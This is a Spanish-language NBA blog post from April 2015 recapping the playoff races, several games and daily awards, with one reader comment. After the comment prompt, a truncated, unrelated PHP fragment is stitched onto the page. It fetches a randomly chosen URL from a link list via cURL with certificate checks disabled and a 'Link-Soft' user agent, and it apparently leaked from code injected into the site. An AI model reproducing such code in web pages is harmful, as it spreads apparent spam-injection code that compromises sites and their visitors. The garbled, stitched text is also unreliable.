La Crónica: Frentes abiertos en primavera

09 de April de 2015 por txusma

Quedan apenas unas jornadas pero tenemos todavía 4 frentes abiertos interesantísimos. Por un lado la lucha por la ventaja de campo en ambas conferencias y por el otro las últimas plazas que dan acceso a los PO. En este momentos, rien Raptors, Bulls, Celtics y Nets en el Este, y Grizzlies, Rockets, Clippers y Pelicans en el Oeste pero todo puede cambiar de un día para otro. Sobretodo porque los actuales campeones han entrado en “modo anillo” y ya apuntan a la 2ª posición del Oeste.

Houston Rockets 98 – San Antonio Spurs 110

Hace un par de semanas casi se podía oir el ruido que hacía la maquinaria de los Spurs cuando se desperezaba poco a poco y empezaba a ponerse en marcha. Llegaba la primavera y con ella su momento. Actualmente los tejanos son 6º del Oeste pero las apuestas ya les sitúan como uno de los grandes favoritos para llevarse el anillo de campeón. No en vano, ya están muy cerca de conseguir la 2ª posición que ocupan hoy en día los Grizzlies. Si tuviera que apostar no tendrían ninguna duda en que se le acabaron llevando.

Ayer se impusieron en casa a uno de sus rivales directos, los Houston Rockets, que venían en plena forma tras ganar sus últimos 3 partidos. Las cosas empezaron bien para los visitantes con James Harden anotando y Dwight Howard capturando rebotes pero Tony Parker, que en teoría padecía molestias en el tendón de aquiles, mantuvo a los suyos en el partido durante unos primeros minutos en los que el resto de sus compañeros parecían todavía medio dormidos. Una vez tomado el café, la maquinaria se puso definitivamente en marcha y ya no paró hasta llevarse el partido cómodamente. 

Cleveland Cavaliers 104 – Milwaukee 99

“Dejadme que esto lo mato yo”. Eso parecía decir Lebron James a sus compañeros cuando botaba la bola ante la atenta mirada de Jared Dudley. Los Cavs estaban sólo 2 puntos arriba a falta de 30 segundos tras un triple de OJ Mayo. Tras botar y botar, saltito a la derecha, salto y triplazo, como quien no quiere la cosa. Los Bucks habían presentado dura batalla pero finalmente caían ante el talento de “King” James que se había dedicado buena parte del choque a jugar para sus compañeros. Eso sí, llegado el último cuarto, 10 puntos y el triple que os comentábamos. Hachas afilidas de cara a los PO.

El resto de la jornada

Los Pelicans debieron celebrar hasta altas horas de la madrugada su clasificación momentánea para los Playoffs porque ayer fueron masacrados por los Grizzlies por 35 puntos de diferencia. Recordatorio de que si llegan a clasificarse para Playoffs tendrán que esforzarse mucho para no irse de vacío para casa. Desde hoy sus únicos rivales en la lucha por esa octava plaza son oficialmente los Thunder porque con la derrota de ayer frente los Mavs (que ya son séptimos del Oeste pase lo que pase) los Suns se despiden de la postemporada. Los Blazers se hicieron con el liderato de la división Northwest gracias a una fácil victoria frente los Wolves pero continúan peleando por la ventaja de la campo con Clippers, Spurs, Grizzlies y Rockets. Será, sin duda, uno de los focos de estas últimas jornadas. Por su parte, los Utah Jazz se confirman con otra victoria (esta ante los Kings) como uno de los mejores equipos tras el All-Star y los Nuggets se impusieron a los Lakers con un gran tercer cuarto.

En el Este, volvió Derrick Rose pero los Bulls cayeron ante los Magic por culpa de una bandeja de Victor Oladipo a falta de 1.5 segundos. El base de Chicago disputó 19 minutos y anotó 9 puntos. Alerta porque con las victoria de Raptors y Wizards ante Bobcats y Sixers, respectivamente, se aprieta la lucha por la ventaja de campo. Ahora mismo Raptors y Bulls están empatados en la 3ª y 4ª posición y los Wizards están 5º a una sola victoria. En la lucha por entrar en los Playoffs victoria de los Celtics que se sitúan 7º empatados con los Nets, que cayeron en un gran partido frente los Hawks. Los Pacers cumplieron el “trámite Knickerbocker” pero quedan fuera temporalmente. Atentos: Celtics 7º, Nets 8º y a una sola victoria Pacers y Heat. Apasionante final de regular el que nos espera.

PREMIOS

MVP: A Kenneth Faried le ha sentado especialmente bien la marcha de Brian Shaw y lo demuestra con partidos como el de ayer: 29 puntos (11 de 14 en TC), 11 rebotes, 2 robos y 2 tapones. Isaiah Thomas también brilló con luz propia en la victoria de los Celtics. Fue el mejor de los suyos con 34 puntos y 6 asistencias.

Rookie: Bien cerquita del triple-doble se quedó Elfrid Payton, exactamente a un rebote y una sola asistencia. El de los Magic anotó 17 puntos, robó 2 balones y como decimos consiguió 9 rebotes y 9 asistencias. No dejaremos tampoco de destacar a Rodney Hood y sus 20 puntos y 8 rebotes en la victoria de los Jazz.

Sorpresa: En ausencia de John Wall, Ramon Sessions lideró la paliza de los Wizards sobre los Sixers con 19 puntos, 7 asistencias y 4 rebotes.

Decepción: Ryan Anderson jugó sólo 12 minutos pero le dio tiempo a fallar los 6 tiros que intentó. De todas maneras mucho peor lo ha hecho Tobias Harris que ha fallado 11 de sus 13 lanzamientos a canasta.

Esfuerzo en vano: Michael Carter-Williams lideró a los Bucks en su partido frente los Cavs pero finalmente no pudieron alzarse con la victoria. El de los Sixers acabó con 30 puntos y 8 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. oli dice:
    #1

    De verdad que apasionante este final de temporada, yo estoy centrado más en la conferencia oeste, sobretodo en la lucha por la segunda plaza.

    Si los spurs ganan en casa de los rockets, y los clippers a los grizzlies y el resto de partidos que tienen los ganan, y los rockets y grizzlies también ganan todo lo que les queda menos los duelos directos, empatarían los 4 a 56 victorias y 26 derrotas!!!!
    He mirado como sería el desempate se supone quien tenga más victorias en los partidos entre los 4 sería el segundo, pero no he podido mirar quien sería.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>